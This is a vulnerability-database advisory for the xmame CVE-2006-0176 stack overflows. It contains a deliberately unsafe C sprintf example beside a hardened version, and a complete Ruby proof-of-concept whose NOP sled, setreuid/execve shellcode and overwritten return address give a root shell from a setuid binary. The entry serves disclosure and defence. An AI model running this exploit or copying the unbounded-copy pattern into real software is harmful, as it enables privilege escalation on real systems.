XMame Buffer Overflow Vulnerability

Vulnerability ID: 1109618    Type: Buffer overflow
Published: 2006-01-10    Updated: 2006-01-17
CVE: CVE-2006-0176    CNNVD ID: CNNVD-200601-104
Platform: Linux    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/1412
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-104
|Vulnerability details
Multiple buffer overflows exist in certain functions in src/fileio.c and src/unix/fileio.c of xmame before 2006-01-11. A local user can gain privileges through an overly long (1) -lang, (2) -ctrlr, (3) -pb or (4) -rec argument on many operating systems, and through an overly long (5) -jdev argument on Ubuntu Linux. The option values are copied into fixed-size stack buffers without a length check, so a long value runs past the buffer and overwrites the saved return address of the vulnerable frame. The issue is local-only: it yields elevated privileges only where the xmame binary (xmame.x11 in the PoC below) is installed setuid, which is what the PoC's setreuid() shellcode relies on.
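The bug class described above, as an added example that is not xmame's own code: a command-line option value is composed into a fixed-size stack buffer with no bound (the vulnerable shape), next to a hardened version that computes the required length first and fails closed instead of truncating. The function names, the 1024-byte buffer size, the directory string and the helper check_poc_sized_arg() are assumptions made for illustration; the 1056-byte argument length mirrors the PoC below.

```c
/* Added example, not xmame's code: model of the CVE-2006-0176 bug class.
 * Names, PATH_BUF and the directory string are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 1024   /* assumed size of the on-stack path buffer */

/* Vulnerable pattern: sprintf into a fixed stack buffer, caller controls
 * `opt` (the value of -lang etc.). Once strlen(dir)+1+strlen(opt) exceeds
 * the buffer, the copy runs over the saved frame pointer and return
 * address, which is exactly what the PoC's 1056-byte argument does.
 * Only ever call this with short input. */
int build_path_unsafe(const char *dir, const char *opt)
{
    char path[PATH_BUF];
    sprintf(path, "%s/%s", dir, opt);   /* unbounded write */
    return (int)strlen(path);
}

/* Hardened pattern: size the result before writing, reject input that does
 * not fit rather than silently truncating (a truncated path would still be
 * "valid" and could open the wrong file), then copy with an explicit bound.
 * Returns the path length on success, -1 if the input does not fit. */
int build_path_safe(char *out, size_t outsz, const char *dir, const char *opt)
{
    size_t need = strlen(dir) + 1 + strlen(opt) + 1;   /* dir '/' opt NUL */
    if (out == NULL || outsz == 0 || need > outsz)
        return -1;
    int n = snprintf(out, outsz, "%s/%s", dir, opt);
    if (n < 0 || (size_t)n >= outsz)   /* cannot happen after the check, kept as a guard */
        return -1;
    return n;
}

/* Normal use: a short language name fits. */
int demo_short(void)
{
    char out[PATH_BUF];
    return build_path_safe(out, sizeof out, "/tmp", "en");   /* "/tmp/en" */
}

/* Feed the hardened function an argument shaped like the PoC's: 1056 bytes
 * of attacker-controlled data. It must be rejected, not written. */
int check_poc_sized_arg(void)
{
    char out[PATH_BUF];
    char *lang = malloc(1056 + 1);
    if (lang == NULL)
        return -2;
    memset(lang, 'A', 1056);
    lang[1056] = '\0';
    int rc = build_path_safe(out, sizeof out, "/usr/share/xmame/lang", lang);
    free(lang);
    return rc;
}

int main(void)
{
    printf("short argument: %d\n", demo_short());
    printf("PoC-sized argument: %d\n", check_poc_sized_arg());
    return 0;
}
```

The important design choice is in build_path_safe(): it rejects oversized input instead of letting snprintf() truncate it, because a truncated path is still a well-formed path and silently changes which file the program opens.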
|Exploit (PoC)
#!/usr/bin/ruby
# encoding: binary

#
# One of the PoC codes for the xmame "-lang" option.
# Advisory is based on: http://kerneltrap.org/node/6055
#
# by xwings at mysec dot org
# url : http://www.mysec.org , new website

# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1)
# xmame 0.102 , ./configure && make && make install
#
# The "encoding: binary" magic comment keeps every string literal as raw bytes
# on Ruby 1.9+ (Ruby 1.8, which this was written for, treats strings as bytes
# anyway). Without it the UTF-8 literals and the packed return address cannot
# be concatenated, and the length arithmetic counts characters, not bytes.

# setreuid(geteuid(),geteuid()); execl() of /bin//sh; 49 bytes, no NUL bytes.
# Privileges are only gained if xmame.x11 runs setuid (geteuid() != getuid()).
shellcode =     "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+
                "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+
                "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+
                "\x31\xdb\xcd\x80"

vulnpath        = "/usr/games/xmame.x11"   # setuid-installed binary (adjust to your install)
argvopt         = "-lang"

# Hard-coded stack address inside the NOP sled for the tested build. It depends
# on environment size, kernel and binary layout and must be re-derived (e.g. in gdb).
ret     = 0xbfffe8da
retadd  = [ret].pack('V')   # 32-bit little-endian

# 1056 bytes total: NOP sled, shellcode, then the return address, which lands on
# the saved EIP of the vulnerable frame.
nops    = "\x90" * (1056 - (shellcode.bytesize + retadd.bytesize))
buffer  = nops + shellcode + retadd

# argv form of system(): no shell is involved, the buffer is passed verbatim.
system(vulnpath, argvopt, buffer)

# milw0rm.com [2006-01-10]
|References

Source: BID
Name: 16203
Link: http://www.securityfocus.com/bid/16203
Source: BUGTRAQ
Name: 20060110 mysec.org Security Advisory: Xmame buffer overflow, with a possibility of privilege escalation
Link: http://www.securityfocus.com/archive/1/archive/1/421849/100/0/threaded
Source: FULLDISC
Name: 20060110 mysec.org Security Advisory: Xmame buffer overflow, with a possibility of privilege escalation.
Link: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0353.html
Source: XF
Name: xmame-multiple-parameters-bo(24102)
Link: http://xforce.iss.net/xforce/xfdb/24102
Source: x.mame.net
Link: http://x.mame.net/changes-unix.html